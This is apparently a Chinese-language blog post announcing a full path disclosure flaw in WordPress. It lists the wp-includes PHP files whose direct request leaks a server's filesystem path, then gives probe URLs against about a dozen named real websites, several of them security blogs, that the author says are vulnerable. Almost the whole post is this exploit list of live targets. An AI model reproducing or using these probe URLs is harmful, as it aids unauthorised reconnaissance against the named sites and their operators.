1337爆出个Wordpress全版本爆路径漏洞,某大黑一来就想溢出我,把我给吓尿了……我求求你不要溢出我的小站,各位大黑阔手下留情刀下留人管下留撸。。
全版本https://ha.cker.in/wp-includes/registration-functions.php
我也发几个,Wordpress爆路径
/wp-includes/rss.php
/wp-includes/rss-functions.php
/wp-includes/shortcodes.php
wp-includes/taxonomy.php
/wp-includes/script-loader.php
例子
http://www.wordpress-fr.net/wp-includes/rss.php
http://www.jinxiaoblog.com/wp-includes/rss.php
http://www.vibethemes.com/wp-includes/rss.php
http://www.wordpress-fr.net/wp-includes/shortcodes.php
http://www.wordpress-fr.net/wp-includes/script-loader.php
随便测试了几个大牛. 基本都中枪.
http://blog.gentilkiwi.com/wp-includes/rss.php
http://www.0x50sec.org/wp-includes/rss-functions.php
http://www.dis9.com/wp-includes/shortcodes.php
http://madman.in/wp-includes/script-loader.php
http://www.tzsec.net/wp-includes/taxonomy.php
http://www.secreader.com/wp-includes/rss.php
无图无真相,我加点图好了。